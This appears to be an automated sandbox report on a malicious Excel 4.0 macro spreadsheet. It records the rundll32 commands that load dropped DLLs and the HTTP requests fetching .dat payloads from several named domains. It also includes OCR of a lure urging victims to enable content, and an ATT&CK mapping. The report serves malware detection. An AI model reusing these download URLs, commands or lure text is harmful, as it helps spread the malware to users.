Create Interactive Tour

Analysis Report SecuriteInfo.com.XF.AShadow.4960.21593.8307

Overview

General Information

Sample Name:	SecuriteInfo.com.XF.AShadow.4960.21593.8307 (renamed file extension from 8307 to xls)
Analysis ID:	357282
MD5:	b00ae2a23ee80960d42e155f9814b490
SHA1:	7673823a676d34a46128f8f6d7f09e8b2f3d8db4
SHA256:	80d0f40411596b3f2350399c4d76f19d892771f835c1b2f6e3c77955e72e784f
Infos:
Most interesting Screenshot:

Detection

Hidden Macro 4.0

Score:	84
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malicious Excel 4.0 Macro

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Document exploit detected (UrlDownloadToFile)

Document exploit detected (process start blacklist hit)

Found Excel 4.0 Macro with suspicious formulas

Sigma detected: Microsoft Office Product Spawning Windows Shell

Yara detected hidden Macro 4.0 in Excel

Document contains embedded VBA macros

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Uses a known web browser user agent for HTTP communication

Yara signature match

Classification

Startup

System is w7x64

EXCEL.EXE (PID: 2516 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)

rundll32.exe (PID: 2924 cmdline: rundll32 ..\JDFR.hdfgr,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)

rundll32.exe (PID: 2892 cmdline: rundll32 ..\JDFR.hdfgr1,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)

rundll32.exe (PID: 2876 cmdline: rundll32 ..\JDFR.hdfgr2,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)

rundll32.exe (PID: 2512 cmdline: rundll32 ..\JDFR.hdfgr3,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)

rundll32.exe (PID: 3036 cmdline: rundll32 ..\JDFR.hdfgr4,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
SecuriteInfo.com.XF.AShadow.4960.21593.xls	SUSP_EnableContent_String_Gen	Detects suspicious string that asks to enable active content in Office Doc	Florian Roth	0xadf2:$e1: Enable Editing 0xae3c:$e1: Enable Editing 0x158cc:$e1: Enable Editing 0x15916:$e1: Enable Editing 0x20083:$e1: Enable Editing 0x200cd:$e1: Enable Editing 0xae5a:$e2: Enable Content 0x15934:$e2: Enable Content 0x200eb:$e2: Enable Content
SecuriteInfo.com.XF.AShadow.4960.21593.xls	JoeSecurity_HiddenMacro	Yara detected hidden Macro 4.0 in Excel	Joe Security

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\JDFR.hdfgr,DllRegisterServer, CommandLine: rundll32 ..\JDFR.hdfgr,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2516, ProcessCommandLine: rundll32 ..\JDFR.hdfgr,DllRegisterServer, ProcessId: 2924

Signature Overview

• AV Detection
• Compliance
• Software Vulnerabilities
• Networking
• System Summary
• Hooking and other Techniques for Hiding and Protection
• HIPS / PFW / Operating System Protection Evasion

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://pathinanchilearthmovers.com/eznwcdhx/44251495573726900000.dat

Avira URL Cloud: Label: malware

Compliance:

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Uses secure TLS version for HTTPS connections

Show sources

Source: unknown

HTTPS traffic detected: 138.36.237.100:443 -> 192.168.2.22:49170 version: TLS 1.2

Software Vulnerabilities:

Document exploit detected (UrlDownloadToFile)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\rundll32.exe

Source: global traffic

DNS query: name: rzminc.com

Source: global traffic

TCP traffic: 192.168.2.22:49170 -> 138.36.237.100:443

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 72.52.227.180:80

Networking:

Source: Joe Sandbox View	IP Address: 162.241.80.6 162.241.80.6
Source: Joe Sandbox View	IP Address: 138.36.237.100 138.36.237.100
Source: Joe Sandbox View	IP Address: 68.66.216.42 68.66.216.42
Source: Joe Sandbox View	IP Address: 72.52.227.180 72.52.227.180

Source: Joe Sandbox View

JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Source: global traffic	HTTP traffic detected: GET /xklyulyijvn/44251495573726900000.dat HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: rzminc.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /eznwcdhx/44251495573726900000.dat HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: pathinanchilearthmovers.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xjzpfwc/44251495573726900000.dat HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: jugueterialatorre.com.arConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /fdzgprclatqo/44251495573726900000.dat HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: rzminc.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /otmchxmxeg/44251495573726900000.dat HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: biblicalisraeltours.comConnection: Keep-Alive

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /xklyulyijvn/44251495573726900000.dat HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: rzminc.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /eznwcdhx/44251495573726900000.dat HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: pathinanchilearthmovers.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xjzpfwc/44251495573726900000.dat HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: jugueterialatorre.com.arConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /fdzgprclatqo/44251495573726900000.dat HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: rzminc.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /otmchxmxeg/44251495573726900000.dat HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: biblicalisraeltours.comConnection: Keep-Alive

Source: rundll32.exe, 00000003.00000002.2135248089.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2129180884.0000000001C20000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2120797082.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2117147505.0000000001B30000.00000002.00000001.sdmp

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: unknown

DNS traffic detected: queries for: rzminc.com

Source: rundll32.exe, 00000003.00000002.2135248089.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2129180884.0000000001C20000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2120797082.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2117147505.0000000001B30000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000003.00000002.2135248089.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2129180884.0000000001C20000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2120797082.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2117147505.0000000001B30000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000003.00000002.2135422495.0000000001C87000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2129380276.0000000001E07000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2121238818.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2117336102.0000000001D17000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000003.00000002.2135422495.0000000001C87000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2129380276.0000000001E07000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2121238818.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2117336102.0000000001D17000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: rundll32.exe, 00000003.00000002.2135422495.0000000001C87000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2129380276.0000000001E07000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2121238818.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2117336102.0000000001D17000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000003.00000002.2135422495.0000000001C87000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2129380276.0000000001E07000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2121238818.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2117336102.0000000001D17000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: rundll32.exe, 00000003.00000002.2135248089.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2129180884.0000000001C20000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2120797082.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2117147505.0000000001B30000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000003.00000002.2135422495.0000000001C87000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2129380276.0000000001E07000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2121238818.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2117336102.0000000001D17000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000003.00000002.2135248089.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2129180884.0000000001C20000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2120797082.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2117147505.0000000001B30000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000006.00000002.2117147505.0000000001B30000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown	Network traffic detected: HTTP traffic on port 49170 -> 443

Source: unknown

HTTPS traffic detected: 138.36.237.100:443 -> 192.168.2.22:49170 version: TLS 1.2

System Summary:

Found malicious Excel 4.0 Macro

Show sources

Source: SecuriteInfo.com.XF.AShadow.4960.21593.xls

Initial sample: urlmon

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 4	Screenshot OCR: Enable Editing, please click Enabk 14 from the yellow bar above f y-t."\|\| I xa I 15 " lnn\|\| I F?
Source: Screenshot number: 8	Screenshot OCR: Enable Editing, please click Enabli " ' ' 14 from the yellow bar above RunDLL \|~\| 15 16 Therewas
Source: Screenshot number: 12	Screenshot OCR: Enable Editing, please click Enable Content 14 1 from the yellow bar above 15 CI 0 16 ' 17 I 18
Source: Screenshot number: 12	Screenshot OCR: Enable Content 14 1 from the yellow bar above 15 CI 0 16 ' 17 I 18 I WHY I CANNOTOPEN THIS DocU
Source: Document image extraction number: 2	Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Content
Source: Document image extraction number: 2	Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? You are using iOS or Andro
Source: Document image extraction number: 8	Screenshot OCR: Enable Editing from the yellow bar above @Once You have Enable Editing, please click Enable Conten
Source: Document image extraction number: 8	Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? m You are using IDS or And

Found Excel 4.0 Macro with suspicious formulas

Show sources

Source: SecuriteInfo.com.XF.AShadow.4960.21593.xls

Initial sample: EXEC

Source: SecuriteInfo.com.XF.AShadow.4960.21593.xls

OLE indicator, VBA macros: true

Source: SecuriteInfo.com.XF.AShadow.4960.21593.xls, type: SAMPLE

Matched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal84.expl.evad.winXLS@11/13@6/4

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\5BCE0000

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRC457.tmp

Jump to behavior

Source: SecuriteInfo.com.XF.AShadow.4960.21593.xls

OLE indicator, Workbook stream: true

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Source: unknown

Process created: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr,DllRegisterServer

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr,DllRegisterServer
Source: unknown	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr1,DllRegisterServer
Source: unknown	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr2,DllRegisterServer
Source: unknown	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr3,DllRegisterServer
Source: unknown	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr4,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr1,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr2,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr3,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr4,DllRegisterServer

Source: C:\Windows\System32\rundll32.exe	Automated click: OK
Source: C:\Windows\System32\rundll32.exe	Automated click: OK
Source: C:\Windows\System32\rundll32.exe	Automated click: OK
Source: C:\Windows\System32\rundll32.exe	Automated click: OK
Source: C:\Windows\System32\rundll32.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Hooking and other Techniques for Hiding and Protection:

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX

HIPS / PFW / Operating System Protection Evasion:

Yara detected hidden Macro 4.0 in Excel

Show sources

Source: Yara match

File source: SecuriteInfo.com.XF.AShadow.4960.21593.xls, type: SAMPLE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scripting21	Path Interception	Process Injection1	Masquerading1	OS Credential Dumping	File and Directory Discovery1	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	Encrypted Channel2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Exploitation for Client Execution23	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Disable or Modify Tools1	LSASS Memory	System Information Discovery2	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Application Layer Protocol2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Rundll321	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Application Layer Protocol13	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection1	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Ingress Tool Transfer2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Scripting21	LSA Secrets	Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://rzminc.com/xklyulyijvn/44251495573726900000.dat	0%	Avira URL Cloud	safe
http://pathinanchilearthmovers.com/eznwcdhx/44251495573726900000.dat	100%	Avira URL Cloud	malware
http://jugueterialatorre.com.ar/xjzpfwc/44251495573726900000.dat	0%	Avira URL Cloud	safe
http://biblicalisraeltours.com/otmchxmxeg/44251495573726900000.dat	0%	Avira URL Cloud	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://rzminc.com/fdzgprclatqo/44251495573726900000.dat	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
rzminc.com	72.52.227.180	true	false	unknown
biblicalisraeltours.com	68.66.216.42	true	false	unknown
crt.sectigo.com	91.199.212.52	true	false	unknown
jugueterialatorre.com.ar	138.36.237.100	true	false	unknown
pathinanchilearthmovers.com	162.241.80.6	true	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://rzminc.com/xklyulyijvn/44251495573726900000.dat	false	Avira URL Cloud: safe	unknown
http://pathinanchilearthmovers.com/eznwcdhx/44251495573726900000.dat	true	Avira URL Cloud: malware	unknown
http://jugueterialatorre.com.ar/xjzpfwc/44251495573726900000.dat	false	Avira URL Cloud: safe	unknown
http://biblicalisraeltours.com/otmchxmxeg/44251495573726900000.dat	false	Avira URL Cloud: safe	unknown
http://rzminc.com/fdzgprclatqo/44251495573726900000.dat	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check	rundll32.exe, 00000003.00000002.2135422495.0000000001C87000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2129380276.0000000001E07000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2121238818.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2117336102.0000000001D17000.00000002.00000001.sdmp	false		high
http://www.windows.com/pctv.	rundll32.exe, 00000006.00000002.2117147505.0000000001B30000.00000002.00000001.sdmp	false		high
http://investor.msn.com	rundll32.exe, 00000003.00000002.2135248089.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2129180884.0000000001C20000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2120797082.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2117147505.0000000001B30000.00000002.00000001.sdmp	false		high
http://www.msnbc.com/news/ticker.txt	rundll32.exe, 00000003.00000002.2135248089.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2129180884.0000000001C20000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2120797082.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2117147505.0000000001B30000.00000002.00000001.sdmp	false		high
http://www.icra.org/vocabulary/.	rundll32.exe, 00000003.00000002.2135422495.0000000001C87000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2129380276.0000000001E07000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2121238818.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2117336102.0000000001D17000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://investor.msn.com/	rundll32.exe, 00000003.00000002.2135248089.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2129180884.0000000001C20000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2120797082.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2117147505.0000000001B30000.00000002.00000001.sdmp	false		high
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	rundll32.exe, 00000003.00000002.2135422495.0000000001C87000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2129380276.0000000001E07000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2121238818.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2117336102.0000000001D17000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
